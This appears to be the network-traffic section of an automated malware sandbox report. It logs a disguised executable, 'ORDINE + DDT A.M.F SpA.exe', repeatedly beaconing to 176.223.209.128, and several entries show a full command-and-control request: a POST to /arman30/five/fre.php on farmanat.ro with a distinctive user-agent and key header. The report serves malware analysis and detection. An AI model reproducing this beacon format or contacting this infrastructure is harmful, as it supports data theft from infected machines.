                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              543192.168.11.2050387176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              544192.168.11.2050388176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              545192.168.11.2050389176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              546192.168.11.2050390176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              547192.168.11.2050391176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              548192.168.11.2050392176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              549192.168.11.2050393176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              55192.168.11.2049891176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:36.820807934 CET6386OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:36.904438019 CET6386INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              550192.168.11.2050394176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              551192.168.11.2050395176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              552192.168.11.2050396176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              553192.168.11.2050397176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              554192.168.11.2050398176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              555192.168.11.2050399176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              556192.168.11.2050400176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              557192.168.11.2050401176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              558192.168.11.2050402176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              559192.168.11.2050403176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              56192.168.11.2049892176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:37.469780922 CET6387OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:37.553401947 CET6388INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              560192.168.11.2050404176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              561192.168.11.2050405176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              562192.168.11.2050406176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              563192.168.11.2050407176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              564192.168.11.2050408176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              565192.168.11.2050409176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              566192.168.11.2050410176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              567192.168.11.2050411176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              568192.168.11.2050412176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              569192.168.11.2050413176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              57192.168.11.2049893176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:38.005112886 CET6388OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:38.094413042 CET6389INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              570192.168.11.2050414176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              571192.168.11.2050415176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              572192.168.11.2050416176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              573192.168.11.2050417176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              574192.168.11.2050418176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              575192.168.11.2050419176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              576192.168.11.2050420176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              577192.168.11.2050421176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              578192.168.11.2050422176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              579192.168.11.2050423176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              58192.168.11.2049894176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:38.572494984 CET6390OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:38.655184984 CET6390INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              580192.168.11.2050424176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              581192.168.11.2050425176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              582192.168.11.2050426176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              583192.168.11.2050427176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              584192.168.11.2050428176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              585192.168.11.2050429176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              586192.168.11.2050430176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              587192.168.11.2050431176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              588192.168.11.2050432176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              589192.168.11.2050433176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              59192.168.11.2049895176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:39.175559044 CET6391OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:39.260907888 CET6392INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              590192.168.11.2050434176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              591192.168.11.2050435176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              592192.168.11.2050436176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              593192.168.11.2050437176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              594192.168.11.2050438176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              595192.168.11.2050439176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              596192.168.11.2050440176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              597192.168.11.2050441176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              598192.168.11.2050442176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              599192.168.11.2050443176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              6192.168.11.2049825176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:03.921017885 CET6307OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:04.006619930 CET6308INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              60192.168.11.2049896176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:39.761326075 CET6392OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:39.845088005 CET6393INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              600192.168.11.2050444176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              601192.168.11.2050445176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              602192.168.11.2050446176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              603192.168.11.2050447176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              604192.168.11.2050448176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              605192.168.11.2050449176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              606192.168.11.2050450176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              607192.168.11.2050451176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              608192.168.11.2050452176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              609192.168.11.2050453176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              61192.168.11.2049897176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:40.218861103 CET6394OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:40.303121090 CET6394INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              610192.168.11.2050454176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              611192.168.11.2050455176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              612192.168.11.2050456176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              613192.168.11.2050458176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              614192.168.11.2050459176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              615192.168.11.2050460176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              616192.168.11.2050461176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              617192.168.11.2050462176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              618192.168.11.2050463176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              619192.168.11.2050464176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              62192.168.11.2049898176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:40.780535936 CET6395OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:40.863092899 CET6396INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              620192.168.11.2050465176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              621192.168.11.2050466176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              622192.168.11.2050467176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              623192.168.11.2050468176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              624192.168.11.2050469176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              625192.168.11.2050470176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              626192.168.11.2050471176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              627192.168.11.2050472176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              628192.168.11.2050473176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              629192.168.11.2050474176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              63192.168.11.2049899176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:41.373512030 CET6396OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:41.457207918 CET6397INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              630192.168.11.2050475176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              631192.168.11.2050476176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              632192.168.11.2050477176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              633192.168.11.2050478176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
